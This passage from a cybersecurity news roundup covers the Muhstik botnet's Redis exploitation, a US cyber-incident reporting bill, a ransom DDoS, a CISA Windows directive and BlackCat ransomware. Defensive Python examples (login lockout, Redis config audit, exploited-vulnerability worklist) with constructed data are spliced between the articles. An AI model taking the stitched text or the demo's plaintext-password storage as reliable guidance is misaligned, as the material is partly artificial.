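# password hashes, never plaintext; the point here is the lockout logic.
DEVICE_USERS = {"admin": "correct horse battery staple"}


def attempt_login(policy: LockoutPolicy, account: str, password: str,
                  now: float, users: dict = DEVICE_USERS) -> str:
    """Return 'ok', 'denied' or 'locked'. The lock state is checked before the
    password, so a locked account cannot be probed at all."""
    if policy.is_locked(account, now):
        return "locked"
    expected = users.get(account, "")
    # Constant-time comparison; unknown accounts still count as failures so
    # username guessing does not bypass the policy.
    if account in users and hmac.compare_digest(expected.encode(), password.encode()):
        policy.record_success(account)
        return "ok"
    return "locked" if policy.record_failure(account, now) else "denied"


if __name__ == "__main__":
    policy = LockoutPolicy(max_failures=3, window_seconds=60, lockout_seconds=120)
    for t, pw in [(0, "wrong"), (1, "wrong"), (2, "wrong"),
                  (3, "correct horse battery staple"), (122, "correct horse battery staple")]:
        print(f"t={t:>3}s -> {attempt_login(policy, 'admin', pw, t)}")
```

Two design points matter more than the counters themselves: the lock is checked before the password is compared, so the right password cannot slip through during a lockout, and failures expire on a sliding window rather than living forever, so a legitimate operator who mistypes twice on Monday is not one attempt away from lockout on Friday.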

The warnings come three weeks after security firm Armis uncovered multiple high-impact vulnerabilities in APC Smart-UPS devices that could be exploited remotely by unauthenticated attackers, without user interaction, to turn the devices into a physical weapon. Two of the main vulnerabilities are flaws in SmartConnect's TLS implementation – the first is a buffer overflow memory bug, and the second is a problem with the way SmartConnect's TLS handshake works.

Muhstik Botnet Targeting Redis Servers by Exploiting Recently Published Bug


The Muhstik botnet, infamous for spreading via web application exploits, has been spotted targeting and exploiting a Lua sandbox escape flaw (CVE-2022-0543) in Redis servers after a proof-of-concept exploit was publicly released.

The Lua sandbox escape flaw was uncovered in the open-source, in-memory key-value data store in February 2022 and could be exploited to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 on the severity scale.

"Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host," Ubuntu explained in an advisory released last month. 

The attacks exploiting the new flaw started on March 11, 2022, leading to the retrieval of a malicious shell script ("") from a remote server, which is then used to fetch and execute the botnet binaries from another server, Juniper Threat Labs researchers explained.

According to Chinese security firm Netlab 360, the Muhstik botnet is known to be active since March 2018 and is monetized for performing coin mining activities and staging distributed denial-of-service (DDoS) attacks. 

The botnet propagates by exploiting home routers, but researchers noticed multiple attempted exploits for Linux server propagation. The list of compromised routers includes GPON home router, DD-WRT router, and the Tomato router. The vulnerabilities exploited by Muhstik over the years are as follows – 

• CVE-2017-10271 (CVSS score: 7.5) – An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware 
• CVE-2018-7600 (CVSS score: 9.8) – Drupal remote code execution vulnerability 
• CVE-2019-2725 (CVSS score: 9.8) – Oracle WebLogic Server remote code execution vulnerability 
• CVE-2021-26084 (CVSS score: 9.8) – An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and 
• CVE-2021-44228 (CVSS score: 10.0) – Apache Log4j remote code execution vulnerability (aka Log4Shell) 

"This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force," Juniper Threat Labs researchers said in a report published last week. In light of active exploitation of the critical security loophole, users are strictly advised to act quickly to patch their Redis services to the latest version.
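As the Ubuntu advisory quoted above makes clear, CVE-2022-0543 is only reachable by a client that can already send Lua scripts (EVAL) to the server, which is why internet-exposed, unauthenticated Redis instances are the ones a botnet can harvest. Patching is the fix; the block below is an added example, not code from Juniper, Netlab 360 or the Redis project, of the configuration review a defender would run alongside it: it parses a redis.conf body and flags listening on all interfaces, protected mode disabled, no `requirepass`, and scripting commands left enabled. Both configuration strings are constructed for the demo, and the `rename-command` approach to disabling EVAL is one Redis has long supported (Redis 7 ACLs offer `-@scripting` as the preferred alternative).

```python
"""Redis configuration audit around the exposure that makes CVE-2022-0543 reachable.

Added example, not from any vendor or from the Redis project. The checks are
defence in depth around the real fix (patching the affected package).
"""

WEAK_CONF = """\
# constructed: a typical internet-exposed, unauthenticated instance
bind 0.0.0.0
protected-mode no
port 6379
"""

HARDENED_CONF = """\
# constructed: loopback only, password required, Lua entry points disabled
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command EVAL ""
rename-command EVALSHA ""
rename-command SCRIPT ""
"""

WILDCARD_BINDS = {"0.0.0.0", "::", "*", "-::*"}
SCRIPT_COMMANDS = ("EVAL", "EVALSHA", "SCRIPT")


def parse_conf(text: str) -> dict:
    """Map each directive (lower-cased) to the list of argument lists seen for it."""
    directives: dict = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, *args = line.split()
        # redis.conf writes an empty value as ""; normalise that to ''.
        args = [a.strip('"') for a in args]
        directives.setdefault(name.lower(), []).append(args)
    return directives


def audit_redis_conf(text: str) -> list:
    """Return finding codes, in a fixed order, for a redis.conf body."""
    conf = parse_conf(text)
    findings = []

    binds = conf.get("bind")
    if binds is None:
        findings.append("BIND_MISSING")          # no bind directive = all interfaces
    elif any(addr in WILDCARD_BINDS for args in binds for addr in args):
        findings.append("BIND_ALL_INTERFACES")

    # Last occurrence wins, as it does for Redis itself.
    if conf.get("protected-mode", [["yes"]])[-1][:1] == ["no"]:
        findings.append("PROTECTED_MODE_OFF")

    if "requirepass" not in conf:
        findings.append("NO_REQUIREPASS")

    # rename-command <cmd> "" removes the command entirely.
    disabled = {args[0].upper() for args in conf.get("rename-command", [])
                if len(args) >= 2 and args[1] == ""}
    for cmd in SCRIPT_COMMANDS:
        if cmd not in disabled:
            findings.append(f"SCRIPTING_{cmd}_ENABLED")
    return findings


if __name__ == "__main__":
    print("weak:    ", audit_redis_conf(WEAK_CONF))
    print("hardened:", audit_redis_conf(HARDENED_CONF))
```

Running it over a fleet's redis.conf files turns the advisory's "patch quickly" into a prioritised list: instances that trip `BIND_ALL_INTERFACES` or `BIND_MISSING` together with `NO_REQUIREPASS` are the ones the Muhstik scanner described above would actually reach.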

New Bipartisan Bill Would Require Firms to Report Cyber Incidents Within 72 hours


Financial institutions critical to U.S. national interests will now have to report substantial cyber assaults and ransom payments to the federal government, an Associated Press report said, under a bill passed by Congress and expected to be signed by President Joe Biden.

The move comes amid the escalating war in Ukraine and concerns of possible Russian cyber threats to U.S. firms. Last year, multiple private and government organizations were jolted by a series of high-profile digital espionage campaigns and disruptive ransomware attacks. The reporting will give the federal government much greater visibility into hacking efforts that target private firms, which have often skipped going to the FBI or other agencies for assistance.

The reporting requirement was approved by the House and Senate on Thursday. It is expected to be signed into law by President Biden soon. “It’s clear we must take bold action to improve our online defenses,” stated Sen. Gary Peters, a Michigan Democrat who leads the Senate Homeland Security and Government Affairs Committee.

AP wrote that the new rules require any entity considered part of America’s critical infrastructure, including finance, transportation, and energy, to report any “substantial cyber incident” within 72 hours, and any ransomware payment they make within 24 hours, to the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency. 

According to Heather Hogsett, a senior leader of the Bank Policy Institute’s technology policy division, the 36-hour notices of service disruption “allow bank regulators to keep a pulse on what is happening in the country’s financial services industry” while the 72- and 24-hour notices to CISA will allow the agency to “produce reports about threat actors and provide early warning of potential attack vectors.”

In recent years ransomware attacks have flourished beyond expectation and have targeted multiple high-profile organizations. Last year, the ransomware operators targeted the biggest U.S. fuel pipeline and the world’s biggest meat packing company. 

The state hackers based in Russia and China have had success in spying on and hacking U.S. targets, including those that are deemed critical infrastructure, Reuters reported.

Security experts and government officials are concerned that Russia's war in Ukraine has increased the threat of cyberattacks against U.S. entities, by either state or proxy actors. Many ransomware operators live and work in Russia. 

“As our nation rightly supports Ukraine during Russia’s illegal unjustifiable assault, I am concerned the threat of Russian cyber and ransomware attacks against U.S. critical infrastructure will increase. The federal government must be able to quickly coordinate a response and hold these bad actors accountable," said Sen. Rob Portman, a Republican from Ohio.

Imperva Mitigates 2.5 million RPS Ransom DDoS Assaults Targeting Unnamed Firm


Imperva, a cybersecurity software and services firm, on Friday claimed it thwarted a massive 2.5 million RPS (requests per second) ransom DDoS attack targeting an unnamed company.

According to Nelli Klepfish, a security analyst at Imperva, the company against which the DDoS assault was launched received multiple ransom notes during the attack. To prevent the loss of "hundreds of millions" in market cap and to remain online, the company paid the attackers in bitcoin.

Imperva thwarted more than 12 million embedded requests targeting random pages of the firm's site. The next day, the attackers sent over 15 million requests to the same site; this time the URL contained a different message. The attackers employed a similar methodology, threatening the company's CEO with devastating consequences, such as the company's stock price plummeting, if they refused to pay the ransom.

The most devastating assault is said to have lasted less than a minute, during which researchers measured a peak of 2.5 million RPS (1.5 Gbps of TCP traffic in terms of bandwidth).

An identical attack against one of the sister sites operated by the same firm lasted nearly 10 minutes, even as the attackers constantly changed their tactics and ransom notes to evade mitigation.

Evidence gathered by Imperva points to the DDoS assaults originating from the Mēris botnet, which has exploited a now-patched security flaw in MikroTik routers (CVE-2018-14847) to strike targets, including Yandex, a Russia-based technology and search engine giant, last September.

"The types of sites the threat actors are after appear to be business sites focusing on sales and communications," Klepfish said. "Targets tend to be U.S.- or Europe-based with the one thing they all have in common being that they are all exchange-listed companies and the threat actors use this to their advantage by referring to the potential damage a DDoS attack could do to the company stock price."

Imperva identified about 34,815 attack sources. In 20% of the cases Imperva observed, the attackers launched 90,000 to 750,000 RPS. The top attack sources were in Indonesia, followed by the U.S., China, Brazil, India, Colombia, Russia, Thailand, Mexico, and Argentina.

Imperva also noted that the attackers claimed to be members of REvil, the infamous ransomware-as-a-service cartel that suffered a major setback after a number of its operators were arrested by Russian law enforcement agencies this January. However, the researchers have yet to confirm whether the claims were made by the original REvil operators or by an impostor.

CISA Issues Warning to Federal Agencies Regarding Actively Exploited Windows Flaw


The US Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch their systems against an actively exploited Windows vulnerability that allows malicious actors to gain administrator privileges on a device. The vulnerability affects Windows 10, Windows 11, and Windows Server.

In a CISA notice published February 4, all Federal Civilian Executive Branch (FCEB) agencies were given two weeks to comply and patch their systems to mitigate the threat from this actively exploited Windows vulnerability, tracked as CVE-2022-21882.

Additionally, CISA recommended all private and public sector firms reduce their exposure to ongoing cyber assaults by adopting this Directive and prioritizing mitigation of vulnerabilities included in its catalog of actively exploited security flaws. 

"CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below," the cybersecurity agency said today. "These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose a significant risk to the federal enterprise."
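The directive's practical effect is a deadline per catalog entry, and the useful output for a defender is the list of hosts that still carry a catalogued flaw, ordered by how close that deadline is. The block below is an added example, not CISA's tooling: it joins a catalog fragment shaped like the public KEV JSON feed (field names as published at the time of writing) against a host inventory. The `CVE-2022-21882` entry uses the February 4 publication date and two-week deadline stated in the notice; the second catalog entry, its dates, and the host names are constructed placeholders for the demo.

```python
"""Prioritising remediation from a Known Exploited Vulnerabilities (KEV) feed.

Added example, not CISA's own tooling. Catalog and inventory below are
constructed; only CVE-2022-21882 and its two-week deadline come from the notice.
"""
from datetime import date

KEV_FRAGMENT = {
    "vulnerabilities": [
        {"cveID": "CVE-2022-21882", "vendorProject": "Microsoft", "product": "Win32k",
         "dateAdded": "2022-02-04", "dueDate": "2022-02-18"},
        # Placeholder entry: identifier, product and dates are invented.
        {"cveID": "CVE-0000-PLACEHOLDER", "vendorProject": "ExampleVendor",
         "product": "Example Appliance", "dateAdded": "2022-02-01", "dueDate": "2022-03-31"},
    ]
}

# Constructed inventory: each host lists CVEs a vulnerability scanner still reports.
INVENTORY = [
    {"host": "fileserver-01", "unpatched": ["CVE-2022-21882"]},
    {"host": "workstation-17", "unpatched": ["CVE-2022-21882", "CVE-0000-PLACEHOLDER"]},
    {"host": "jump-03", "unpatched": ["CVE-2020-NOT-IN-KEV"]},
]


def kev_deadlines(catalog: dict) -> dict:
    """Map each catalogued CVE id to its remediation due date."""
    return {v["cveID"]: date.fromisoformat(v["dueDate"]) for v in catalog["vulnerabilities"]}


def kev_worklist(catalog: dict, inventory: list, today: date) -> list:
    """Return (host, cveID, dueDate, days_left) for every unpatched KEV entry,
    most urgent first. Negative days_left means the deadline has already passed.
    Flaws not in the catalog carry no directive deadline and are omitted."""
    due = kev_deadlines(catalog)
    rows = []
    for host in inventory:
        for cve in host["unpatched"]:
            if cve in due:
                rows.append((host["host"], cve, due[cve].isoformat(), (due[cve] - today).days))
    rows.sort(key=lambda r: (r[3], r[0]))
    return rows


def overdue(catalog: dict, inventory: list, today: date) -> list:
    """Subset of the worklist whose directive deadline has passed."""
    return [r for r in kev_worklist(catalog, inventory, today) if r[3] < 0]


if __name__ == "__main__":
    for row in kev_worklist(KEV_FRAGMENT, INVENTORY, date(2022, 2, 10)):
        print("%-15s %-22s due %s (%+d days)" % row)
```

The same join is what turns "prioritize mitigation of vulnerabilities included in its catalog" into a daily report: pull the current feed, diff it against scanner output, and escalate anything that appears in `overdue()`.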

According to Microsoft's advisory, attackers with limited access to exploited devices can use the newly obtained user rights to spread laterally within the network, create new admin users, or execute privileged commands.

"A local, authenticated attacker could gain elevated local system or administrator privileges through a vulnerability in the Win32k.sys driver," researchers explained. This vulnerability affects systems running Windows 7, Windows 8, Windows 10, and Windows 11 as well as Windows Server 2019 and 2022. The bug is also a bypass of another Windows Win32k privilege escalation bug (CVE-2021-1732), a zero-day flaw patched in February 2021 and actively exploited in attacks since at least the summer of 2020.

Security experts at BleepingComputer also examined an exploit targeting this bug and discovered no issues compiling the exploit and using it to open Notepad with SYSTEM privileges on a Windows 10 system (the exploit didn't work on Windows 11). 

In recent months, Windows patches have hit the headlines for the wrong reasons especially after Microsoft botched not one, but two zero-day patches. This led to security researcher Abdelhamid Naceri, who identified one of the failed patches, sarcastically warning users: “you better wait and see how Microsoft will screw the patch again.”

BlackCat Ransomware Gang Employing Novel Techniques to Target Organizations


Last year in December, malware researchers from Recorded Future and MalwareHunterTeam unearthed ALPHV (aka BlackCat), the first professional ransomware strain that was designed in the Rust programming language. In this post, we will explore some of the methodologies employed by ransomware developers to target organizations.

According to an analysis published last month by Varonis, BlackCat was observed recruiting operators from multiple ransomware organizations, offering to allow affiliates to leverage the ransomware and keep 80-90% of the ransom payment.

“The group’s leak site, active since early December 2021, has named over twenty victim organizations as of late January 2022, though the total number of victims, including those that have paid a ransom to avoid exposure, is likely greater,” Varonis’s Jason Hill explained. 

The attackers leveraging BlackCat, often referred to as the "BlackCat gang," employ multiple tactics that are becoming increasingly commonplace in the ransomware space. Notably, they use several extortion techniques in some cases, including the siphoning of victim data before ransomware deployment, threats to release data if the ransom is not paid, and distributed denial-of-service (DDoS) attacks.

According to cybersecurity researchers at Recorded Future, the ALPHV/BlackCat developer was previously involved with the REvil ransomware gang. Last month, the Russian government disclosed that at the United States’ request it arrested 14 individuals in Russia linked to the REvil ransomware gang.

Still, REvil rolls on despite these actions, according to Paul Roberts at ReversingLabs. “The recent arrests have NOT led to a noticeable change in detections of REvil malicious files,” Roberts wrote. “In fact, detections of files and other software modules associated with the REvil ransomware increased modestly in the week following the arrests by Russia’s FSB intelligence service.” 

Meanwhile, the U.S. State Department has a standing $10 million reward for information leading to the identification or location of any individuals holding key leadership positions in REvil. 

As of December 2021, BlackCat has the seventh-largest number of victims listed on their leak site among ransomware groups tracked by Unit 42 researchers. While Conti (ranked second) has been around in various guises for almost two years, it is surrounded at the top of the chart by emerging families.